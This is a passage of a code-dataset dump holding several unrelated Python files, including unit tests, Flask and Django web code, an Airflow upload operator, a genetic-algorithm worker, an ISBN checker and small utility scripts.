processor.call_with_history(exp_data.data[0])\n\n self.assertEqual(exp_data.data[0], expected_old)\n self.assertTrue(np.allclose(new_data, expected_new))\n\n self.assertEqual(history[0][0], \"ToReal\")\n self.assertTrue(np.allclose(history[0][1], expected_new))\n\n def test_to_imag(self):\n \"\"\"Test that we can average the data.\"\"\"\n processor = DataProcessor(\"memory\")\n processor.append(ToImag(scale=1e-3))\n\n exp_data = ExperimentData(FakeExperiment())\n exp_data.add_data(self.result_lvl1)\n\n new_data = processor(exp_data.data[0])\n\n expected_old = {\n \"memory\": [\n [[1103260.0, -11378508.0], [2959012.0, -16488753.0]],\n [[442170.0, -19283206.0], [-5279410.0, -15339630.0]],\n [[3016514.0, -14548009.0], [-3404756.0, -16743348.0]],\n ],\n \"metadata\": {\"experiment_type\": \"fake_test_experiment\", \"x_values\": 0.0},\n }\n\n expected_new = np.array(\n [\n [-11378.508, -16488.753],\n [-19283.206000000002, -15339.630000000001],\n [-14548.009, -16743.348],\n ]\n )\n\n self.assertEqual(exp_data.data[0], expected_old)\n self.assertTrue(np.allclose(new_data, expected_new))\n\n # Test that we can call with history.\n new_data, history = processor.call_with_history(exp_data.data[0])\n self.assertEqual(exp_data.data[0], expected_old)\n self.assertTrue(np.allclose(new_data, expected_new))\n\n self.assertEqual(history[0][0], \"ToImag\")\n self.assertTrue(np.allclose(history[0][1], expected_new))\n\n def test_populations(self):\n \"\"\"Test that counts are properly converted to a population.\"\"\"\n\n processor = DataProcessor(\"counts\")\n processor.append(Probability(\"00\"))\n\n new_data = processor(self.exp_data_lvl2.data[0])\n\n self.assertEqual(new_data[0], 0.4)\n self.assertEqual(new_data[1], 0.4 * (1 - 0.4) / 10)\n\n def test_validation(self):\n \"\"\"Test the validation mechanism.\"\"\"\n\n for validate, error in [(False, AttributeError), (True, DataProcessorError)]:\n processor = DataProcessor(\"counts\")\n processor.append(Probability(\"00\", validate=validate))\n\n with self.assertRaises(error):\n processor({\"counts\": [0, 1, 2]})\n","sub_path":"test/data_processing/test_data_processing.py","file_name":"test_data_processing.py","file_ext":"py","file_size_in_byte":7626,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"190696042","text":"import os\nimport sys\nfrom pylib.base.flags import Flags\n\nfrom config import VALID_MODULES\nfrom web.server.app import create_app\n\n\ndef main():\n Flags.PARSER.add_argument(\n '--port',\n '-p',\n type=int,\n required=False,\n default=5000,\n help='Port the server should use',\n )\n Flags.PARSER.add_argument(\n '--environment',\n '-e',\n required=False,\n type=str,\n default='',\n help='The Zenysis environment that the server should use. '\n 'Can optionally be specified by setting the `ZEN_ENV` environment '\n 'variable. The environment variable will take precedence over '\n 'the command-line argument.',\n choices=[env for env in VALID_MODULES],\n )\n Flags.InitArgs()\n\n environment = (\n Flags.ARGS.environment if Flags.ARGS.environment else os.getenv('ZEN_ENV')\n )\n if not environment:\n raise ValueError(\n 'The Zenysis environment that the server should use is not set. '\n 'It can optionally be specified by setting the `ZEN_ENV` environment '\n 'variable or passing the environment flag.'\n )\n\n app = create_app(zenysis_environment=environment)\n app.run(host='0.0.0.0', port=Flags.ARGS.port)\n\n\nif __name__ == '__main__':\n sys.exit(main())\n","sub_path":"web/runserver.py","file_name":"runserver.py","file_ext":"py","file_size_in_byte":1321,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"23923871","text":"from datetime import date\n\nclass Employee:\n\n def __init__ (self, employee_name , employee_age, employee_salary, employment_year):\n self.name = employee_name\n self.age = employee_age\n self.salary = employee_salary\n self.employment_year = employment_year\n\n def get_working_years(self):\n current_year = date.today().year\n return current_year - self.employment_year\n\n def __str__(self):\n return 'Employee (name= '+ self.name +', age= '+ str(self.age) +', salary= '+ str(self.salary) +', employment year: '+ str(self.employment_year) + ')'\n\nclass Manager(Employee):\n\n def __init__(self, employee_name , employee_age, employee_salary, employment_year, bonus):\n super().__init__(employee_name , employee_age, employee_salary, employment_year)\n self.bonus_percentage = bonus\n\n def get_working_years(self):\n current_year = date.today().year\n return current_year - self.employment_year\n\n def get_bonus(self):\n return self.bonus_percentage * self.salary\n\n def __str__(self):\n return 'Manager (name= '+ self.name +', age= '+ str(self.age) +', salary= '+ str(self.salary) +', employment year: '+ str(self.employment_year) + ', bonus: '+str(self.bonus_percentage) + ')'\n\n\ndef main():\n employees = []\n managers = []\n\n print (\"Options:\")\n print (\" 1. Show Employees\")\n print (\" 2. Show Managers\")\n print (\" 3. Add An Employee\")\n print (\" 4. Add A Manager\")\n print (\" 5. Exit\")\n\n x = int(input (\"Please choose an option from 1-5: \"))\n\n\n while x != 5 :\n if x == 1:\n print(\"***************************\")\n print(\"Employees: \")\n for item in employees:\n print(item)\n elif x == 2:\n print(\"***************************\")\n print(\"Managers: \")\n for item in managers:\n print(item)\n elif x == 3:\n print(\"***************************\")\n print (\"Enter employee info: \")\n name = input(\"name: \")\n age = input(\"age: \")\n salary = float(input(\"salary: \"))\n year = int(input(\"employment date: \"))\n newemp = Employee(name,age,salary,year)\n employees.append(newemp)\n elif x == 4:\n print(\"***************************\")\n print(\"Enter manager info: \")\n name = input(\"name: \")\n age = input(\"age: \")\n salary = float(input(\"salary: \"))\n year = int(input(\"employment date: \"))\n bonus = float(input(\"bonus salary: \"))\n newman = Manager(name,age,salary,year,bonus)\n managers.append(newman)\n print (\"Options:\")\n print (\" 1. Show Employees\")\n print (\" 2. Show Managers\")\n print (\" 3. Add An Employee\")\n print (\" 4. Add A Manager\")\n print (\" 5. Exit\")\n\n x = int(input (\"Please choose an option from 1-5: \"))\n\n\n\nif __name__ == '__main__':\n\tmain()\n","sub_path":"hr_pro.py","file_name":"hr_pro.py","file_ext":"py","file_size_in_byte":3022,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"106522573","text":"def isValid(s):\n stack = []\n right_to_left = {')':'(',']':'[','}':'{'}\n for c in s:\n if stack and c in right_to_left.keys() and stack.pop() != right_to_left[c]: # c is right parenthese\n return False\n elif c in right_to_left.values(): # c is left parenthese\n stack.append(c)\n else: # c is not one of them\n return False\n return stack == []\n\n\nassert isValid('()[]') == True\nassert isValid('[()]') == True\nassert isValid('[(])') == False\n","sub_path":"20_Valid Parentheses/map.py","file_name":"map.py","file_ext":"py","file_size_in_byte":503,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"64162130","text":"import data.model as model_source\nimport os\nimport pandas as pd\nimport pickle\nimport requests\nimport time\n\nfrom core.algorithm_flow import Evolution\nfrom core.models import Model, PopulationImpl, EvolutionParams, EvolutionTask, PopulationHyperParams\nfrom core.validators import HyperParametersDFValidator, ModelValidator, \\\n ImplementationDictValidator, EvolutionDictValidator\nfrom core.implementation import Crossover, Fitness, Mutation, PopulationCopy, \\\n PopulationInit, PopulationMerge, Selection, population_to_pickle\nfrom concurrent.futures import ThreadPoolExecutor\nfrom flask import Flask, request, jsonify\n\napp = Flask(__name__)\n\nSERVER_PORT = 5002\nSERVER_URL = '127.0.0.1:' + str(SERVER_PORT)\nMODEL_URL_PREFIX = 'http://127.0.0.1:5001/model/'\nERROR_URL = 'http://127.0.0.1:5001/model/'\nANALYZER_URL = 'http://localhost:5000/data/'\nTASK_FINISHED_URL = 'http://127.0.0.1:5001/task_finished/'\n\n\nIMPLEMENTATION_OBJ_DICT = {'crossover': 'pmx', 'mutation': 'one_point', 'init': 'init_population',\n 'fitness': 'fitness', 'population_copy': 'copy', 'population_merge': 'merge',\n 'selection': 'select'}\n\n\ndef register_worker():\n def try_connection():\n try:\n requests.get('http://127.0.0.1:5001/')\n return True\n except requests.ConnectionError:\n return False\n\n while not try_connection():\n time.sleep(5)\n\n requests.post('http://127.0.0.1:5001/worker_ready/' + str(os.getpid()) + '/' + SERVER_URL)\n\n\ndef download_model_file(model_name: str):\n model_file = requests.get(MODEL_URL_PREFIX + model_name)\n with open(os.path.join(os.getcwd(), 'model.txt'), 'w') as dest_file:\n dest_file.write(model_file.text)\n\n\ndef send_data(population, url: str):\n pickled_soluton = population_to_pickle(population)\n try:\n requests.post(url, pickled_soluton)\n except requests.ConnectionError:\n pass\n\n\nclass EvolutionManager:\n\n def __init__(self):\n self._evolution_tasks = []\n self._evolution_objects = []\n\n def add_evolution_task(self, evolution_task: EvolutionTask):\n self._evolution_tasks.append(evolution_task)\n\n def initialize_waiting_tasks(self):\n new_evolution_objects = [Evolution.from_task(task) for task in self._evolution_tasks]\n self._evolution_objects.extend(new_evolution_objects)\n for ev_object in self._evolution_objects:\n ev_object.init_evolution()\n self._evolution_tasks = []\n\n def start_evolution(self):\n thread_pool = ThreadPoolExecutor(max_workers=2)\n for evolution_object in self._evolution_objects:\n for _ in range(evolution_object.batch_amount):\n current_population = evolution_object.evolve()\n thread_pool.submit(send_data, current_population, ANALYZER_URL + evolution_object.population_name)\n\n\n@app.route('/', methods=['POST'])\ndef init_evolution():\n params = pickle.loads(request.data)\n download_model_file(params['model_file'])\n\n hyperparams_df = create_hyperparams_df(params)\n\n try:\n hyperparams = create_hyperparams(hyperparams_df)\n model = create_model()\n implementation_obj = create_implementation_object()\n evolution_params = create_evolution_params_object({'batch_size': 10, 'generations': params['size']})\n except Exception as e:\n requests.post(ERROR_URL + params['name'], data=pickle.dumps([params['worker_id'], params['model_file']]))\n # return jsonify({})\n raise e\n\n evolution_manager.add_evolution_task(EvolutionTask(population_name=params['name'],\n evolution_params=evolution_params,\n model=model,\n population_impl=implementation_obj,\n population_hyperparams=hyperparams))\n evolution_manager.initialize_waiting_tasks()\n evolution_manager.start_evolution()\n\n requests.post(TASK_FINISHED_URL + params['worker_id'] + '/' + params['name'])\n\n return jsonify({})\n\n\ndef create_hyperparams_df(params):\n hyperparams_dict = dict(crossover_coef=[params['crossover']], mutation_coef=[params['mutation']], pop_size=[params['size']])\n hyperparams_df = pd.DataFrame.from_dict(hyperparams_dict)\n return hyperparams_df\n\n\ndef create_hyperparams(hyperparams_df):\n HyperParametersDFValidator.validate(hyperparams_df)\n hyperparams_df.pop_size.astype(int)\n return PopulationHyperParams.from_from_dataframe(hyperparams_df)\n\n\ndef create_model():\n model_dict = model_source.get_model(os.path.join(os.getcwd(), os.path.join(os.getcwd(), 'model.txt')))\n model = Model.from_dict(model_dict)\n ModelValidator.validate(model)\n return model\n\n\ndef create_implementation_object():\n ImplementationDictValidator.validate(IMPLEMENTATION_OBJ_DICT)\n implementation_classes = {'crossover': Crossover,\n 'mutation': Mutation,\n 'init': PopulationInit,\n 'fitness': Fitness,\n 'population_copy': PopulationCopy,\n 'population_merge': PopulationMerge,\n 'selection': Selection}\n implementation_dict = dict()\n for func, name in IMPLEMENTATION_OBJ_DICT.items():\n _cls = implementation_classes[func]\n implementation_dict[func] = (_cls, _cls.__dict__[name])\n return PopulationImpl.from_dict(implementation_dict)\n\n\ndef create_evolution_params_object(evolution_params: dict):\n EvolutionDictValidator.validate(evolution_params)\n return EvolutionParams.from_dict(evolution_params)\n\n\nif __name__ == '__main__':\n evolution_manager = EvolutionManager()\n register_worker()\n app.run(port=SERVER_PORT)\n","sub_path":"controller.py","file_name":"controller.py","file_ext":"py","file_size_in_byte":5883,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"81660808","text":"import re\n\ndef verify(isbn):\n formattedString = re.sub('[^xX0-9]+', '', isbn)\n\n if (len(formattedString) != 10):\n return False\n\n multiplicand = 10\n sumDigits = 0\n\n for char in formattedString:\n if (multiplicand != 1 and (char == 'x' or char == 'X')):\n return False\n elif (multiplicand == 1 and (char == 'x' or char == 'X')):\n sumDigits += 10\n else:\n sumDigits += multiplicand * int(char)\n \n multiplicand -= 1\n \n return sumDigits % 11 == 0\n","sub_path":"isbn-verifier/isbn_verifier.py","file_name":"isbn_verifier.py","file_ext":"py","file_size_in_byte":535,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"474965061","text":"# -*- coding: utf-8 -*-\n\nfrom airflow.utils.decorators import apply_defaults\nfrom rekcurd_airflow.operators.rekcurd_operator import RekcurdOperator\nfrom airflow.exceptions import AirflowException\nfrom airflow.hooks.http_hook import HttpHook\nimport json\nfrom requests import Request\nfrom urllib.parse import urljoin\n\n\nclass EvaluationUploadOperator(RekcurdOperator):\n \"\"\"\n Upload evaluation data\n\n :param app_id: The targetted Rekcurd application ID.\n :type app_id: integer\n :param evaluation_file_path: file path to evaluation data to be uploaded\n :type evaluation_file_path: string\n \"\"\"\n @apply_defaults\n def __init__(self,\n app_id,\n timeout=300,\n evaluation_file_path=None,\n *args, **kwargs):\n super().__init__(\n endpoint='/api/applications/{}/evaluations'.format(app_id),\n timeout=timeout,\n method='POST',\n *args,\n **kwargs)\n\n self.__evaluation_path = evaluation_file_path\n\n def execute(self, context):\n http = HttpHook(self.method, http_conn_id=self.http_conn_id)\n session = http.get_conn(self.headers)\n with open(self.__evaluation_path, 'rb') as evaluation_file:\n evaluation_data = evaluation_file.read()\n\n req = Request(self.method,\n urljoin(http.base_url, self.endpoint),\n files={'file': evaluation_data},\n headers=self.headers)\n\n response = http.run_and_check(session,\n session.prepare_request(req),\n self.extra_options)\n result = json.loads(response.text)\n\n if result['status']:\n self.log.info(f'Success. evaluation_id: {result[\"evaluation_id\"]}')\n else:\n raise AirflowException(result['message'])\n\n return result[\"evaluation_id\"]\n","sub_path":"rekcurd_airflow/operators/evaluation_upload_operator.py","file_name":"evaluation_upload_operator.py","file_ext":"py","file_size_in_byte":1936,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"350707749","text":"from django.conf.urls import patterns, url\nfrom regsoft.views import *\n\nurlpatterns = [\n\turl(r'^firewallzouter/scan/$', firewallzo_dashboard),\n\turl(r'^firewallzouter/scan/(?P\\d+)$', firewallzo_dashboard_two),\n\turl(r'^firewallzouter/confirm/$', firewallzo_confirm),\n\turl(r'^firewallzouter/confirm/(?P\\d+)$', firewallzo_setgleader),\n\turl(r'^firewallzouter/groupcodes/$', gcodelist),\n\turl(r'^firewallzouter/testx/$', testx),\n\turl(r'^firewallzouter/unconfirm/(?P\\d+)$', firewallzo_unconfirm),\n\turl(r'^firewallzouter/unconfirmed/(?P\\d+)$', firewallzo_unconfirm),\n\turl(r'^firewallzouter/edit/(?P\\d+)$', firewallzo_edit_part),\n\turl(r'^firewallzouter/add/(?P\\d+)$', firewallzo_add),\n\turl(r'^firewallzouter/add_guest/$', firewallzo_add_guest),\n\turl(r'^firewallzouter/barcodelist/$', get_barcode),\n\n\turl(r'^common/search/$', common_search, name=\"common_search\"),\n\n\turl(r'^controlz/home/$', controlz_home),\n\turl(r'^controlz/stats/$', controlz_stats, name=\"controlz_stats\"),\n\turl(r'^controlz/home/(?P\\d+)$', controlz_dashboard),\n\turl(r'^controlz/edit/(?P\\d+)$', controlz_edit_part),\n\turl(r'^controlz/bill_select/$', controlz_bill_select),\n\turl(r'^controlz/bill_delete/$', controlz_delete_bill),\n\turl(r'^controlz/bill_view/(?P\\d+)/$', controlz_view_bill),\n\turl(r'^controlz/bill_details/(?P\\d+)$', controlz_bill_details),\n\turl(r'^controlz/recnacc_bill_list/$', recnacc_bill_list),\n\turl(r'^controlz/recnacc_bill_print/(?P\\d+)$', recnacc_bill_print),\n\t# url(r'^controlz/billdetails/(?P\\d+)$', ),\n\n\turl(r'^controlz/bill_print/$', controlz_bill_print),\n\turl(r'^group_notify/$', recnacc_notify),\n\n\n\n\turl(r'^recnacc/home/$', recnacc_home),\n\turl(r'^recnacc/home/(?P\\d+)$', recnacc_dashboard),\n\turl(r'^recnacc/allot/(?P\\d+)$', recnacc_allot),\n\turl(r'^recnacc/faculty_allot/(?P\\d+)$', recnacc_faculty_allot),\n\turl(r'^recnacc/deallocate/(?P\\d+)$', recnacc_deallocate),\n\turl(r'^recnacc/checkout/(?P\\d+)$', recnacc_checkout),\n\t#url(r'^recnacc/return_inventory/(?P\\d+)$', recnacc_return_inventory),\n\turl(r'^recnacc/checkedout_select_gl/$', recnacc_checkedout_select_gl),\n\turl(r'^recnacc/checked_out_participants/(?P\\d+)$', recnacc_checked_out_participants),\n\turl(r'^recnacc/checked_out_list/(?P\\d+)$', recnacc_checked_out_participants_in),\n\turl(r'^recnacc/bhavan_inventory_list/$', recnacc_bhavan_inventory_list),\n\turl(r'^recnacc/room_availibility_list/$', recnacc_room_availibility_list),\n\turl(r'^recnacc/bhavan_gleader_list/$', recnacc_bhavan_gleader_list),\n\turl(r'^recnacc/room_list/$', recnacc_room_list),\n\turl(r'^recnacc/room_details/(?P\\d+)$', recnacc_room_details),\n\t\n\n\turl(r'^teams/$', mainScreen, name='main'),\n\turl(r'^teams/uploadlist/$', upload_list, name='upload_list'),\n\turl(r'^teams/chooseLeader/$', choose_leader, name='choose_leader'),\n\turl(r'^teams/genTeam/$', genTeam, name='genTeam'),\n\turl(r'^teams/addbitsian/$', bitsian_add, name='add_bitsian'),\n\n\turl(r'^teams/participantdetails/(?P\\d+)/$', participant_details, name=\"participant_details\"),\n\turl(r'^teams/participantdetails/$', participant_details_home, name=\"participant_home\"),\n\turl(r'^teams/eventdetails/(?P\\d+)/$', event_details, name=\"event_details\"),\n\turl(r'^teams/eventdetails/$', event_details_home, name=\"event_home\"),\n\turl(r'^teams/teamdetails/(?P\\d+)/$', team_details, name=\"team_details\"),\n\turl(r'^teams/teamdetails/$', team_details_home, name=\"team_home\"),\n\n\turl(r'^teams/getparticipantlist/$', getParticipantList, name='getParticipantList'),\n\n\turl(r'^teams/selectEvent_delete/$', selectEvent_manageTeams, name='selectEvent_manageTeams'),\n\turl(r'^teams/selectTeam_delete/$', showTeams_manageTeams, name='showTeams_manageTeams'),\n\turl(r'^teams/deleteTeams/$', deleteTeam_manageTeams, name='deleteTeam_manageTeams'),\n\n\turl(r'^teams/show_teamList/$', eventlist_showTeams, name='eventlist_showTeams'),\n\turl(r'^teams/show_selectEvent/$', eventList_selectEvent, name='eventList_selectEvent'),\n\turl(r'^teams/singleTeam/(?P\\d+)/$', eventList_selectEvent, name='eventList_selectEvent'),\n \n \turl(r'^teams/finalist_selectEvent/$', finalist_selectEvent, name=\"finalist_selectEvent\"), \n \turl(r'^teams/finalist_showTeams/$', finalist_showTeams, name=\"finalist_showTeams\"), \n \turl(r'^teams/setFinalist/$', setFinalist, name=\"setFinalist\"), \n\n \turl(r'^teams/winner_selectEvent/$', winner_selectEvent, name=\"winner_selectEvent\"), \n \turl(r'^teams/winner_showTeams/$', winner_showTeams, name=\"winner_showTeams\"), \n \turl(r'^teams/setWinner/$', setWinner, name=\"setWinner\"), \n\n\n\n\n \turl(r'^genteam_txt/$', certi_gen_txt), \n\n\t# url(r'^firewallzouter/scan/$', firewallzo_dashboard),\n\t# url(r'^firewallzouter/scan/$', firewallzo_dashboard),\n\n\n\t# url(r'^firewallzouter/edit/', firewallzo_home),\n\t# url(r'^firewallzouter/(?P\\w+)/', firewallzo_home),\n\t\n \n\t# url(r'^getbarcode/$', get_barcode, name='get barcode'),\n\t# url(r'^firewallz/$', firewallzo_gl, name='firewallz outer booth home'),\n\t# url(r'^firewallz/edit/(?P\\d+)/$',firewallzo_edit_participant,name='editing individual participants'),\n\t# url(r'^firewallz/add/(?P\\d+)/$',firewallzo_add_participant,name='add participant'),\n\t# url(r'^firewallz/newgl/(?P\\d+)/$',firewallzo_gl_reassign,name='firewallzo_gl_reassign'),\n\t# url(r'^firewallz/remove/(?P\\d+)/$',firewallzo_remove_people,name='remove participant'),\n\t# url(r'^firewallzi/$',firewallz_fid,name='Firewallz Inner Booth'),\n\t# url(r'^recnacc/$', reconec_home, name='recnacc home'),\n\t# url(r'^recnacc/dashboard/(?P\\d+)/$',recnacc_dashboard, name='recnacc_dashboard'),\n\t# url(r'^recnacc/allot/(?P\\d+)/$',acco_list,name='provides accomodation'),\n\t# url(r'^recnacc/deallocate/(?P\\d+)/$',reconec_deallocate,name='provides accomodation'),\n\t# url(r'^recnacc/phonedetails/(?P\\d+)/$',phonedetails,name='phone numbers'),\n\t# url(r'^recnacc/checkout/(?P\\d+)/$',reconec_checkout,name='checkout people'),\n\t# url(r'^recnacc/all_bhavans/$', all_bhawans, name='all bhavans'),\n\t# url(r'^recnacc/roomdetails/$', room_details, name='all bhavans'),\n\t# url(r'^recnacc/bhavanwise/$',college_in_bhavan,name='bhavan college mapping'),\n\t# url(r'^controlz/receipt/$', receipt, name='controlzhome'),\n\t# url(r'^controlz/lists/$', controlz_lists, name='controlzlists'),\n\t# url(r'^controlz/add_denominations/(?P\\d+)/$', enter_denominations, name='denominationsform'),\n\t# url(r'^controlz/eventdetails/$', controlz_event_details, name='event participants details'),\n\t# url(r'^controlz/make_sl/(?P\\d+)/$',controlz_sport_leader,name='making sport leader'),\n\t# url(r'^controlz/edit/(?P\\d+)/$',controlz_edit_participant,name='editing individual participants for controlz'),\n\t# url(r'^controlz/revert_bill/(?P\\d+)/$',controlz_cancel_bill,name='cancel bill'),\n\t# url(r'^showbills/$', show_prev_bills, name='show bills'),\n\t# url(r'^bill_detail/(?P\\d+)/$', bill_details, name='view bill Details'),\n\t# url(r'^controlz/bill/(?P\\d+)/$',generate_receipt,name='print bill'),\n\t# url(r'^controlz/bill_print/(?P\\d+)/$',print_receipt,name='print bill'),\n]\n","sub_path":"regsoft/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":7203,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"513069672","text":"import datetime\nfrom py_scripts.dbComparator import process_uniqs, queryConstructor, process_dates\nfrom py_scripts.helpers import dbHelper, converters\n\n\ndef compare_table(prod_connection, test_connection, table, is_report, service_dir, mapping, start_time,\n comparing_info, **kwargs):\n logger = kwargs.get('logger')\n comparing_step = kwargs.get('comparing_step')\n depth_report_check = kwargs.get('depth_report_check')\n mode = kwargs.get('mode')\n local_break, max_amount = check_amount(prod_connection, test_connection, table, logger)\n if not local_break:\n if is_report:\n dates = converters.convertToList(process_dates.compare_dates(prod_connection, test_connection, table,\n depth_report_check, comparing_info, logger))\n dates.sort()\n query_list = queryConstructor.InitializeQuery(prod_connection, mapping, table,\n comparing_step, logger).report(dates, mode, max_amount)\n else:\n query_list = queryConstructor.InitializeQuery(prod_connection, mapping, table,\n comparing_step, logger).entity(max_amount)\n global_break, local_break = iterate_by_query_list(prod_connection, test_connection, query_list, table,\n start_time, comparing_info, service_dir, **kwargs)\n return global_break\n else:\n logger.warn('Local_break flag detected. Checking of table {} skipped.'.format(table))\n return False\n\n\ndef check_amount(prod_connection, test_connection, table, logger):\n prod_record_amount, test_record_amount = dbHelper.get_amount_records(table,\n None,\n [prod_connection, test_connection],\n logger)\n if prod_record_amount == 0 and test_record_amount == 0:\n logger.warn(\"Table {} is empty on both servers!\".format(table))\n return True, 0\n if prod_record_amount == 0:\n logger.warn(\"Table {} is empty on prod-server!\".format(table))\n return True, 0\n if test_record_amount == 0:\n logger.warn(\"Table {} is empty on test-server!\".format(table))\n return True, 0\n if prod_record_amount != test_record_amount:\n sub_result, type, percents = substract(prod_record_amount, test_record_amount)\n if type == 'Prod':\n base = prod_connection.db\n else:\n base = test_connection.db\n logger.warn(('Amount of records differs for table {}'.format(table) +\n 'Prod record amount: {}. '.format(prod_record_amount) +\n 'Test record amount: {}. '.format(test_record_amount) +\n 'Db {0} have more records. Difference equals {1}, {2:.5f} percents'.format(base, sub_result, percents)))\n max_amount = max(prod_record_amount, test_record_amount)\n return False, max_amount\n\ndef substract(prod_amount, test_amount):\n if prod_amount > test_amount:\n substraction = prod_amount - test_amount\n type = 'Prod'\n percents = substraction / prod_amount\n else:\n substraction = test_amount - prod_amount\n type = 'Test'\n percents = substraction / test_amount\n return substraction, type, percents\n\n\ndef iterate_by_query_list(prod_connection, test_connection, query_list, table, start_time, comparing_info,\n service_dir, **kwargs):\n table_start_time = datetime.datetime.now()\n logger = kwargs.get('logger')\n strings_amount = kwargs.get('strings_amount')\n fail_with_first_error = kwargs.get('fail_with_first_error')\n table_timeout = kwargs.get('table_timeout')\n prod_uniq = set()\n test_uniq = set()\n for query in query_list:\n local_break, prod_tmp_uniq, test_tmp_uniq = get_differences(prod_connection, test_connection, table, query,\n comparing_info, strings_amount, service_dir, logger)\n prod_uniq = process_uniqs.merge_uniqs(prod_uniq, prod_tmp_uniq)\n test_uniq = process_uniqs.merge_uniqs(test_uniq, test_tmp_uniq)\n\n if prod_uniq and test_uniq:\n prod_uniq = process_uniqs.thin_uniq_list(prod_uniq, test_uniq, logger)\n test_uniq = process_uniqs.thin_uniq_list(test_uniq, prod_uniq, logger)\n\n if table_timeout is not None:\n duration = datetime.datetime.now() - table_start_time\n if duration > datetime.timedelta(minutes=table_timeout):\n logger.error(('Checking table {} '.format(table) +\n 'exceded timeout {}. Finished'.format(table_timeout)))\n return False, True\n\n if not local_break and fail_with_first_error:\n logger.info((\"First error founded, checking failed. \" +\n \"Comparing takes {}\").format(datetime.datetime.now() - start_time))\n return True, False\n\n if process_uniqs.check_uniqs(prod_uniq, test_uniq, strings_amount, table, query, service_dir, logger):\n return False, True\n # Hack, intended for writing all uniqs to file\n process_uniqs.check_uniqs(prod_uniq, test_uniq, 0, table, query_list[0], service_dir, logger)\n return False, False\n\n\ndef get_differences(prod_connection, test_connection, table, query, comparing_info,\n strings_amount, service_dir, logger):\n prod_entities, test_entities = dbHelper.DbConnector.parallel_select([prod_connection, test_connection], query)\n if (prod_entities is None) or (test_entities is None):\n logger.warn('Table {} skipped because something going bad'.format(table))\n return False, set(), set()\n prod_uniq = set(prod_entities) - set(test_entities)\n test_uniq = set(test_entities) - set(prod_entities)\n if not any([len(prod_uniq) == 0, len(test_uniq) == 0]):\n logger.error(\"Tables {} differs!\".format(table))\n comparing_info.update_diff_data(table)\n if process_uniqs.check_uniqs(prod_uniq, test_uniq, strings_amount, table, query, service_dir, logger):\n return False, set(), set()\n else:\n return False, prod_uniq, test_uniq\n else:\n return True, set(), set()\n","sub_path":"py_scripts/dbComparator/unified_comparing_class.py","file_name":"unified_comparing_class.py","file_ext":"py","file_size_in_byte":6488,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"57073000","text":"from pymessenger.bot import Bot\r\nimport json\r\nfrom flask import url_for\r\n\r\n'''\r\nA module to collect a bunch of useful, generic messages to send to users.\r\n'''\r\n\r\ndef send_login_button(page_token, receipient_id, login_link):\r\n bot = Bot(page_token)\r\n bot.send_message(receipient_id, json.dumps({\r\n \"attachment\": {\r\n \"type\": \"template\",\r\n \"payload\": {\r\n \"template_type\": \"generic\",\r\n \"elements\": [{\r\n 'title': 'Login to Drive',\r\n 'image_url': 'https://www.google.com/drive/static/images/drive/logo-drive.png'\r\n ,\r\n \"buttons\": [{\r\n \"type\": \"account_link\",\r\n \"url\": url_for(login_link, _external=True)\r\n }]\r\n }]\r\n }\r\n }\r\n }))\r\n","sub_path":"AppMessaging.py","file_name":"AppMessaging.py","file_ext":"py","file_size_in_byte":937,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"177601681","text":"# 画像を一枚指定するとそれが何なのか判定する\nimport ic_module as ic\nimport os.path as op\n\nwhile True :\n while True :\n imgname = input(\"\\n>> 入力したい画像ファイル(「END」で終了):\")\n if op.isfile(imgname) or imgname == \"END\":\n break\n print(\">> そのファイルは存在しません\")\n if imgname == \"END\":\n break\n\n # 関数実行\n ic.TestProcess(imgname)","sub_path":"ML/testprocess.py","file_name":"testprocess.py","file_ext":"py","file_size_in_byte":449,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"229091541","text":"from django.shortcuts import get_object_or_404\nfrom rest_framework import serializers\n\ndef get_model_from_dict_or_uuid(serializer, model, data):\n if isinstance(data, dict):\n if \"uuid\" in data:\n model_to_edit = get_object_or_404(model, uuid=data.get('uuid'))\n serialized_data = serializer(model_to_edit, data=data)\n else:\n serialized_data = serializer(data=data)\n if serialized_data.is_valid(raise_exception=True):\n return serialized_data.save()\n else:\n raise serializers.ValidationError(serializer.errors)\n else:\n return get_object_or_404(model, uuid=data)","sub_path":"API/utils/get_model_from_dict_or_uuid.py","file_name":"get_model_from_dict_or_uuid.py","file_ext":"py","file_size_in_byte":652,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"624662890","text":"'''PROGRAM TO PRINT THE FOLLOWING PATTERN\n* \n* * \n* * * \n* * * * \n* * * \n* * \n* \n'''\n\n#--- main ---\nn=int(input(\"ENTER THE MAXIMUM NUMBER OF STARS YOU WANT :: \")); #INPUT\nfor i in range(n): #INCREASING STARS\n for j in range(i): \n print ('* ', end=\"\") \n print('') \n \nfor i in range(n,0,-1): #DECREASING STARS\n for j in range(i): \n print('* ', end=\"\") \n print('')\n\nQUIT=input(\"\\nPRESS ENTER TO EXIT\")\n","sub_path":"Pattern_2.py","file_name":"Pattern_2.py","file_ext":"py","file_size_in_byte":446,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"340737993","text":"import praw\nimport sub\nimport json\n\nclass Scraper:\n\n\tdef __init__(self, sub, reddit):\n\t\tself.sub = sub\n\t\tself.reddit = reddit\n\t\tself.loadExistingUsers()\n\t\tself.users_found = []\n\n\tdef loadExistingUsers(self):\n\t\twith open(self.sub.existing_users) as json_file:\n\t\t\tdata = json.load(json_file)\n\n\t\t\tself.existing_users = data[\"existing\"]\n\n\n\tdef run(self):\n\n\t\tforceLimit = 